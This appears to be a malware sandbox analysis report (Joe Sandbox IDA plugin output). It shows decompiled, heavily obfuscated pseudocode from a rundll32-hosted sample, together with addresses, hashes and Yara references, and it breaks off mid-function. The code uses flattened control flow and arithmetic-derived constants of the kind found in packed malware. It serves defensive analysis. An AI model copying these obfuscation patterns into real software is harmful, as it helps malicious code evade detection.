                                                                                                                    • String ID: :B8$;r$[h~$y8$|%$&e$0{
                                                                                                                    • API String ID: 0-2624470838
                                                                                                                    • Opcode ID: 641744f5f120c46d8864325ad3b0307f45d566c665ef4614694ed1381a905e45
                                                                                                                    • Instruction ID: a04724a07bec9aea67314d24c70eb4d6528cc20c6f838da04456c11b0d32ba09
                                                                                                                    • Opcode Fuzzy Hash: 641744f5f120c46d8864325ad3b0307f45d566c665ef4614694ed1381a905e45
                                                                                                                    • Instruction Fuzzy Hash: FB5231719093818FD3B9CF25C58AB8BFBE1BBC5348F10891DE1999A260D7B49949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033D6D8 Relevance: 9.2, Strings: 7, Instructions: 408COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E0033D6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* __ecx;
				intOrPtr _t400;
				void* _t407;
				signed int _t410;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				intOrPtr _t434;
				void* _t473;
				intOrPtr* _t482;
				signed int _t485;
				signed int* _t491;
				void* _t493;

				_push(_a16);
				_push(_a12);
				_v16 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003420B9(__edx);
				_v72 = 0xfd05e7;
				_t491 =  &(( &_v192)[6]);
				_v72 = _v72 | 0xfdc7c414;
				_v72 = _v72 ^ 0xfdffc5f6;
				_t489 = 0;
				_v128 = 0x159cf;
				_t421 = 0;
				_v128 = _v128 + 0x2543;
				_t485 = 0x8939926;
				_v128 = _v128 ^ 0xc1c453fb;
				_v128 = _v128 ^ 0xc1c52ce8;
				_v188 = 0xc0a375;
				_t423 = 0x5a;
				_v188 = _v188 / _t423;
				_v188 = _v188 + 0xf5e3;
				_v188 = _v188 + 0xffffba7d;
				_v188 = _v188 ^ 0x0002d452;
				_v192 = 0xeb0e91;
				_v192 = _v192 << 0xb;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 | 0x4be38997;
				_v192 = _v192 ^ 0x4be25280;
				_v52 = 0x3397e5;
				_v52 = _v52 ^ 0x345a01ed;
				_v52 = _v52 ^ 0x346a35aa;
				_v60 = 0x140ff9;
				_t424 = 6;
				_v60 = _v60 / _t424;
				_v60 = _v60 ^ 0x000ad59a;
				_v168 = 0x6059cb;
				_t425 = 0x1a;
				_v168 = _v168 * 0x7f;
				_v168 = _v168 / _t425;
				_v168 = _v168 * 0x21;
				_v168 = _v168 ^ 0x3ca5e455;
				_v112 = 0x1e6ccd;
				_v112 = _v112 << 0xc;
				_v112 = _v112 + 0xffff3925;
				_v112 = _v112 ^ 0xe6c2746b;
				_v44 = 0xb8d15a;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x0008fc1e;
				_v172 = 0x2478d;
				_v172 = _v172 ^ 0x68bbc6f8;
				_v172 = _v172 >> 0xc;
				_v172 = _v172 | 0x6f66efc5;
				_v172 = _v172 ^ 0x6f64ef75;
				_v116 = 0x51a99f;
				_v116 = _v116 | 0x1f129b6c;
				_v116 = _v116 ^ 0xc118cdce;
				_v116 = _v116 ^ 0xde47442a;
				_v132 = 0x216e1a;
				_v132 = _v132 + 0xffff43fb;
				_v132 = _v132 ^ 0x7008f7db;
				_v132 = _v132 ^ 0x702542ff;
				_v84 = 0xc91edc;
				_t426 = 0x5e;
				_v84 = _v84 / _t426;
				_v84 = _v84 ^ 0x0006a22a;
				_v164 = 0xa7de11;
				_v164 = _v164 + 0xffff6841;
				_v164 = _v164 >> 4;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x005f8816;
				_v108 = 0xdd6066;
				_v108 = _v108 >> 8;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x00d87344;
				_v92 = 0x21cc88;
				_v92 = _v92 ^ 0xd81b96af;
				_v92 = _v92 ^ 0xd8329727;
				_v96 = 0xbd6d4e;
				_t427 = 0x26;
				_v96 = _v96 / _t427;
				_v96 = _v96 ^ 0x00061825;
				_v24 = 0x6502ac;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x065de4e3;
				_v56 = 0x642336;
				_v56 = _v56 + 0xffffd3db;
				_v56 = _v56 ^ 0x006ffb84;
				_v68 = 0x348f1;
				_t428 = 0x55;
				_v68 = _v68 / _t428;
				_v68 = _v68 ^ 0x0008f449;
				_v76 = 0x3c74f1;
				_v76 = _v76 + 0xffff407e;
				_v76 = _v76 ^ 0x003b6445;
				_v88 = 0xc452b0;
				_v88 = _v88 + 0xffff3a6d;
				_v88 = _v88 ^ 0x00c8dd7a;
				_v48 = 0xc68c2;
				_t429 = 0x57;
				_v48 = _v48 / _t429;
				_v48 = _v48 ^ 0x0008f98a;
				_v100 = 0x631361;
				_v100 = _v100 | 0x5af5ab8e;
				_v100 = _v100 ^ 0x5affcbc5;
				_v148 = 0x1761a;
				_v148 = _v148 ^ 0xebf93349;
				_v148 = _v148 >> 4;
				_v148 = _v148 ^ 0x0eb625e6;
				_v40 = 0xe5378a;
				_v40 = _v40 >> 2;
				_v40 = _v40 ^ 0x003c8b43;
				_v140 = 0x73545;
				_t430 = 0x61;
				_v140 = _v140 * 0x21;
				_v140 = _v140 / _t430;
				_v140 = _v140 ^ 0x0002b6d6;
				_v80 = 0x39d04;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00009cd0;
				_v156 = 0x1ba0aa;
				_v156 = _v156 + 0x716e;
				_v156 = _v156 << 0xd;
				_v156 = _v156 ^ 0xb6bcbcaf;
				_v156 = _v156 ^ 0x34f57f5f;
				_v20 = 0xda4179;
				_t431 = 0x27;
				_t482 = _v16;
				_v20 = _v20 / _t431;
				_v20 = _v20 ^ 0x00092493;
				_v32 = 0x6dc25;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x0008149e;
				_v180 = 0x3ec4dc;
				_v180 = _v180 >> 5;
				_t432 = 0x70;
				_v180 = _v180 / _t432;
				_v180 = _v180 + 0xffff18e8;
				_v180 = _v180 ^ 0xfff4c632;
				_v64 = 0xea19a3;
				_v64 = _v64 | 0xee52e837;
				_v64 = _v64 ^ 0xeef909eb;
				_v28 = 0xcaf9fa;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x000e6f4e;
				_v120 = 0x563e36;
				_v120 = _v120 >> 0xe;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x00027d23;
				_v176 = 0x87c40f;
				_v176 = _v176 ^ 0xb401f56c;
				_v176 = _v176 + 0xffff7429;
				_v176 = _v176 | 0xf3ec0d69;
				_v176 = _v176 ^ 0xf7eb47c6;
				_v184 = 0x47488d;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 << 0xf;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x0086c0ad;
				_v136 = 0xb24629;
				_v136 = _v136 | 0x7ef33f67;
				_v136 = _v136 ^ 0x7ef17c1c;
				_v144 = 0xba01aa;
				_v144 = _v144 | 0x3cf3a1ff;
				_v144 = _v144 ^ 0x3cf83085;
				_v124 = 0xbe6d5e;
				_v124 = _v124 + 0xffff96e9;
				_v124 = _v124 | 0xcf3d3218;
				_v124 = _v124 ^ 0xcfb1306a;
				_v36 = 0xa69a94;
				_v36 = _v36 + 0xffffed5e;
				_v36 = _v36 ^ 0x00a0b8ce;
				_v104 = 0xa8033b;
				_t433 = 9;
				_v104 = _v104 / _t433;
				_v104 = _v104 >> 6;
				_v104 = _v104 ^ 0x0005e2c3;
				while(1) {
					L1:
					_t434 = _v160;
					while(1) {
						_t400 = _v152;
						while(1) {
							L3:
							_t493 = _t485 - 0xa1723c1;
							if(_t493 > 0) {
								goto L19;
							}
							L4:
							if(_t493 == 0) {
								E00348519(_v144, _v124, _t489);
								_t485 = 0x4b7559b;
								goto L17;
							} else {
								if(_t485 == 0x4b7559b) {
									return E00348519(_v36, _v104, _t421);
								}
								if(_t485 == 0x4ed616e) {
									_t441 = _v172;
									_t407 = E003416AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
									_t491 =  &(_t491[0x12]);
									if(_t407 == 0) {
										L16:
										_t485 = 0xa1723c1;
										L17:
										_t400 = _v152;
									} else {
										_t410 = E0034D25E(_t441);
										_t485 = 0x9a40434;
										_t400 = _v12 * 0x2c + _t421;
										_v152 = _t400;
										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
									}
									_t434 = _v160;
									_t473 = 0x6a50b97;
									continue;
								} else {
									if(_t485 == _t473) {
										E00342007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
										_t400 = E00348F9E(_v32, _v180, _v64, _v28, _v160);
										_t491 =  &(_t491[0xb]);
										L30:
										_t473 = 0x6a50b97;
										goto L31;
									} else {
										if(_t485 == 0x8939926) {
											_t485 = 0xe60f9b1;
											continue;
										} else {
											if(_t485 != 0x9a40434) {
												L31:
												if(_t485 != 0x88fb243) {
													goto L1;
												}
											} else {
												_t434 = E003342C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
												_t491 =  &(_t491[5]);
												_v160 = _t434;
												_t473 = 0x6a50b97;
												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
												_t400 = _v152;
												while(1) {
													L3:
													_t493 = _t485 - 0xa1723c1;
													if(_t493 > 0) {
														goto L19;
													}
													goto L4;
												}
												goto L19;
											}
										}
									}
								}
							}
							L34:
							return _t400;
							L19:
							if(_t485 == 0xaf524c8) {
								_push(_t434);
								_push(_t434);
								_t400 = E00337FF2(0x2000);
								_t489 = _t400;
								if(_t400 == 0) {
									_t485 = 0x4b7559b;
									goto L30;
								} else {
									_t485 = 0x4ed616e;
									goto L17;
								}
							} else {
								if(_t485 == 0xb29ddc7) {
									_t482 = _t482 + 0x2c;
									asm("sbb esi, esi");
									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
									continue;
								} else {
									_t400 = 0xd1a593f;
									if(_t485 == 0xd1a593f) {
										E0033DF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
										_t491 =  &(_t491[5]);
										goto L16;
									} else {
										if(_t485 != 0xe60f9b1) {
											goto L31;
										} else {
											_push(_t434);
											_push(_t434);
											_t400 = E00337FF2(0x20000);
											_t421 = 0xd1a593f;
											if(0xd1a593f != 0) {
												_t485 = 0xaf524c8;
												goto L17;
											}
										}
									}
								}
							}
							goto L34;
						}
					}
				}
			}









































































                                                                                                                    0x0033d6e2
                                                                                                                    0x0033d6eb
                                                                                                                    0x0033d6f2
                                                                                                                    0x0033d6f9
                                                                                                                    0x0033d700
                                                                                                                    0x0033d707
                                                                                                                    0x0033d709
                                                                                                                    0x0033d70e
                                                                                                                    0x0033d719
                                                                                                                    0x0033d71c
                                                                                                                    0x0033d729
                                                                                                                    0x0033d734
                                                                                                                    0x0033d736
                                                                                                                    0x0033d73e
                                                                                                                    0x0033d740
                                                                                                                    0x0033d748
                                                                                                                    0x0033d74d
                                                                                                                    0x0033d755
                                                                                                                    0x0033d75d
                                                                                                                    0x0033d76b
                                                                                                                    0x0033d770
                                                                                                                    0x0033d776
                                                                                                                    0x0033d77e
                                                                                                                    0x0033d786
                                                                                                                    0x0033d78e
                                                                                                                    0x0033d796
                                                                                                                    0x0033d79b
                                                                                                                    0x0033d7a0
                                                                                                                    0x0033d7a8
                                                                                                                    0x0033d7b0
                                                                                                                    0x0033d7bb
                                                                                                                    0x0033d7c6
                                                                                                                    0x0033d7d1
                                                                                                                    0x0033d7e3
                                                                                                                    0x0033d7e8
                                                                                                                    0x0033d7f1
                                                                                                                    0x0033d7fc
                                                                                                                    0x0033d809
                                                                                                                    0x0033d80a
                                                                                                                    0x0033d814
                                                                                                                    0x0033d81d
                                                                                                                    0x0033d821
                                                                                                                    0x0033d829
                                                                                                                    0x0033d831
                                                                                                                    0x0033d836
                                                                                                                    0x0033d83e
                                                                                                                    0x0033d846
                                                                                                                    0x0033d851
                                                                                                                    0x0033d859
                                                                                                                    0x0033d864
                                                                                                                    0x0033d86c
                                                                                                                    0x0033d874
                                                                                                                    0x0033d879
                                                                                                                    0x0033d881
                                                                                                                    0x0033d889
                                                                                                                    0x0033d891
                                                                                                                    0x0033d899
                                                                                                                    0x0033d8a1
                                                                                                                    0x0033d8a9
                                                                                                                    0x0033d8b1
                                                                                                                    0x0033d8b9
                                                                                                                    0x0033d8c1
                                                                                                                    0x0033d8cb
                                                                                                                    0x0033d8d9
                                                                                                                    0x0033d8de
                                                                                                                    0x0033d8e7
                                                                                                                    0x0033d8f2
                                                                                                                    0x0033d8fa
                                                                                                                    0x0033d902
                                                                                                                    0x0033d907
                                                                                                                    0x0033d90c
                                                                                                                    0x0033d914
                                                                                                                    0x0033d91c
                                                                                                                    0x0033d921
                                                                                                                    0x0033d926
                                                                                                                    0x0033d92e
                                                                                                                    0x0033d936
                                                                                                                    0x0033d93e
                                                                                                                    0x0033d946
                                                                                                                    0x0033d952
                                                                                                                    0x0033d957
                                                                                                                    0x0033d95d
                                                                                                                    0x0033d965
                                                                                                                    0x0033d970
                                                                                                                    0x0033d978
                                                                                                                    0x0033d983
                                                                                                                    0x0033d98e
                                                                                                                    0x0033d999
                                                                                                                    0x0033d9a4
                                                                                                                    0x0033d9b6
                                                                                                                    0x0033d9bb
                                                                                                                    0x0033d9c4
                                                                                                                    0x0033d9cf
                                                                                                                    0x0033d9da
                                                                                                                    0x0033d9e5
                                                                                                                    0x0033d9f0
                                                                                                                    0x0033d9f8
                                                                                                                    0x0033da00
                                                                                                                    0x0033da08
                                                                                                                    0x0033da1a
                                                                                                                    0x0033da1f
                                                                                                                    0x0033da28
                                                                                                                    0x0033da33
                                                                                                                    0x0033da3b
                                                                                                                    0x0033da43
                                                                                                                    0x0033da4b
                                                                                                                    0x0033da53
                                                                                                                    0x0033da5b
                                                                                                                    0x0033da60
                                                                                                                    0x0033da68
                                                                                                                    0x0033da73
                                                                                                                    0x0033da7b
                                                                                                                    0x0033da86
                                                                                                                    0x0033da93
                                                                                                                    0x0033da94
                                                                                                                    0x0033da9e
                                                                                                                    0x0033daa2
                                                                                                                    0x0033daaa
                                                                                                                    0x0033dab5
                                                                                                                    0x0033dabd
                                                                                                                    0x0033dac8
                                                                                                                    0x0033dad0
                                                                                                                    0x0033dada
                                                                                                                    0x0033dadf
                                                                                                                    0x0033dae7
                                                                                                                    0x0033daef
                                                                                                                    0x0033db03
                                                                                                                    0x0033db08
                                                                                                                    0x0033db0f
                                                                                                                    0x0033db16
                                                                                                                    0x0033db21
                                                                                                                    0x0033db2c
                                                                                                                    0x0033db34
                                                                                                                    0x0033db3f
                                                                                                                    0x0033db47
                                                                                                                    0x0033db52
                                                                                                                    0x0033db57
                                                                                                                    0x0033db5b
                                                                                                                    0x0033db63
                                                                                                                    0x0033db6b
                                                                                                                    0x0033db76
                                                                                                                    0x0033db81
                                                                                                                    0x0033db8c
                                                                                                                    0x0033db97
                                                                                                                    0x0033db9f
                                                                                                                    0x0033dbaa
                                                                                                                    0x0033dbb2
                                                                                                                    0x0033dbb7
                                                                                                                    0x0033dbbc
                                                                                                                    0x0033dbc4
                                                                                                                    0x0033dbcc
                                                                                                                    0x0033dbd4
                                                                                                                    0x0033dbdc
                                                                                                                    0x0033dbe4
                                                                                                                    0x0033dbec
                                                                                                                    0x0033dbf4
                                                                                                                    0x0033dbf9
                                                                                                                    0x0033dbfe
                                                                                                                    0x0033dc02
                                                                                                                    0x0033dc0a
                                                                                                                    0x0033dc12
                                                                                                                    0x0033dc1a
                                                                                                                    0x0033dc22
                                                                                                                    0x0033dc2a
                                                                                                                    0x0033dc32
                                                                                                                    0x0033dc3a
                                                                                                                    0x0033dc42
                                                                                                                    0x0033dc4a
                                                                                                                    0x0033dc52
                                                                                                                    0x0033dc5a
                                                                                                                    0x0033dc65
                                                                                                                    0x0033dc70
                                                                                                                    0x0033dc7b
                                                                                                                    0x0033dc89
                                                                                                                    0x0033dc91
                                                                                                                    0x0033dc95
                                                                                                                    0x0033dc9a
                                                                                                                    0x0033dca2
                                                                                                                    0x0033dca2
                                                                                                                    0x0033dca2
                                                                                                                    0x0033dca6
                                                                                                                    0x0033dca6
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcb0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033dcb6
                                                                                                                    0x0033dcb6
                                                                                                                    0x0033de66
                                                                                                                    0x0033de6c
                                                                                                                    0x00000000
                                                                                                                    0x0033dcbc
                                                                                                                    0x0033dcc2
                                                                                                                    0x00000000
                                                                                                                    0x0033df63
                                                                                                                    0x0033dcce
                                                                                                                    0x0033de01
                                                                                                                    0x0033de05
                                                                                                                    0x0033de0a
                                                                                                                    0x0033de0f
                                                                                                                    0x0033de52
                                                                                                                    0x0033de52
                                                                                                                    0x0033de57
                                                                                                                    0x0033de57
                                                                                                                    0x0033de11
                                                                                                                    0x0033de1f
                                                                                                                    0x0033de27
                                                                                                                    0x0033de39
                                                                                                                    0x0033de3d
                                                                                                                    0x0033de41
                                                                                                                    0x0033de41
                                                                                                                    0x0033de44
                                                                                                                    0x0033de48
                                                                                                                    0x00000000
                                                                                                                    0x0033dcd4
                                                                                                                    0x0033dcd6
                                                                                                                    0x0033dd6a
                                                                                                                    0x0033dd91
                                                                                                                    0x0033dd9b
                                                                                                                    0x0033dda0
                                                                                                                    0x0033df40
                                                                                                                    0x0033df40
                                                                                                                    0x00000000
                                                                                                                    0x0033dcd8
                                                                                                                    0x0033dcde
                                                                                                                    0x0033dd31
                                                                                                                    0x00000000
                                                                                                                    0x0033dce0
                                                                                                                    0x0033dce6
                                                                                                                    0x0033df45
                                                                                                                    0x0033df4b
                                                                                                                    0x00000000
                                                                                                                    0x0033df4d
                                                                                                                    0x0033dcec
                                                                                                                    0x0033dd14
                                                                                                                    0x0033dd16
                                                                                                                    0x0033dd1b
                                                                                                                    0x0033dd24
                                                                                                                    0x0033dd29
                                                                                                                    0x0033dca6
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dcb0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033dcb0
                                                                                                                    0x00000000
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dce6
                                                                                                                    0x0033dcde
                                                                                                                    0x0033dcd6
                                                                                                                    0x0033dcce
                                                                                                                    0x0033df6e
                                                                                                                    0x0033df6e
                                                                                                                    0x0033de73
                                                                                                                    0x0033de79
                                                                                                                    0x0033df22
                                                                                                                    0x0033df23
                                                                                                                    0x0033df24
                                                                                                                    0x0033df29
                                                                                                                    0x0033df2f
                                                                                                                    0x0033df3b
                                                                                                                    0x00000000
                                                                                                                    0x0033df31
                                                                                                                    0x0033df31
                                                                                                                    0x00000000
                                                                                                                    0x0033df31
                                                                                                                    0x0033de7f
                                                                                                                    0x0033de85
                                                                                                                    0x0033def6
                                                                                                                    0x0033defb
                                                                                                                    0x0033df03
                                                                                                                    0x00000000
                                                                                                                    0x0033de87
                                                                                                                    0x0033de87
                                                                                                                    0x0033de8e
                                                                                                                    0x0033dee9
                                                                                                                    0x0033deee
                                                                                                                    0x00000000
                                                                                                                    0x0033de90
                                                                                                                    0x0033de96
                                                                                                                    0x00000000
                                                                                                                    0x0033de9c
                                                                                                                    0x0033deb3
                                                                                                                    0x0033deb4
                                                                                                                    0x0033deb5
                                                                                                                    0x0033deba
                                                                                                                    0x0033dec0
                                                                                                                    0x0033dec6
                                                                                                                    0x00000000
                                                                                                                    0x0033dec6
                                                                                                                    0x0033dec0
                                                                                                                    0x0033de96
                                                                                                                    0x0033de8e
                                                                                                                    0x0033de85
                                                                                                                    0x00000000
                                                                                                                    0x0033de79
                                                                                                                    0x0033dcaa
                                                                                                                    0x0033dca6

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
                                                                                                                    • API String ID: 0-652707834
                                                                                                                    • Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                    • Instruction ID: 29e61a634a66291d426ef9a8c2c1193f29dfaefcc621e9083c815aec524bb43b
                                                                                                                    • Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                    • Instruction Fuzzy Hash: 5312317250C3809FD369DF25D88AA5FBBE2BBC4344F108A1DE5C98A260D7B19949CF53
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003381B7 Relevance: 9.1, Strings: 7, Instructions: 349COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E003381B7() {
				void* _t347;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t360;
				signed int _t364;
				void* _t374;
				intOrPtr _t407;
				signed int _t411;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int* _t422;
				void* _t426;

				 *(_t426 + 0x74) = 0xd212a7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
				_t374 = 0xebf23c2;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
				 *(_t426 + 0x20) = 0x60274e;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				_t414 = 0x29;
				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
				 *(_t426 + 0x9c) = 0x5f71eb;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
				 *(_t426 + 0x1c) = 0x8735e4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
				 *(_t426 + 0x58) = 0x9ed5c5;
				_t415 = 0x17;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
				 *(_t426 + 0x5c) = 0x8fe0dc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
				 *(_t426 + 0x48) = 0x18253c;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
				 *(_t426 + 0x94) = 0x40d4a3;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
				 *(_t426 + 0x20) = 0x8fc5ff;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
				 *(_t426 + 0x38) = 0x52431;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
				 *(_t426 + 0x44) = 0xc4652;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
				 *(_t426 + 0x10) = 0x2c06e;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
				 *(_t426 + 0x7c) = 0xc3ec9d;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
				 *(_t426 + 0x70) = 0x3416d6;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
				 *(_t426 + 0x64) = 0x1e8df6;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
				 *(_t426 + 0x28) = 0xebc79e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
				 *(_t426 + 0x4c) = 0x6795aa;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
				 *(_t426 + 0x50) = 0xbc4be8;
				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
				_t416 = 0x6f;
				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
				 *(_t426 + 0x94) = 0xde468f;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
				 *(_t426 + 0x18) = 0x6e4fa6;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
				 *(_t426 + 0x5c) = 0xc77145;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
				 *(_t426 + 0x44) = 0x492c53;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
				 *(_t426 + 0xa0) = 0x27589;
				_t417 = 0x3e;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
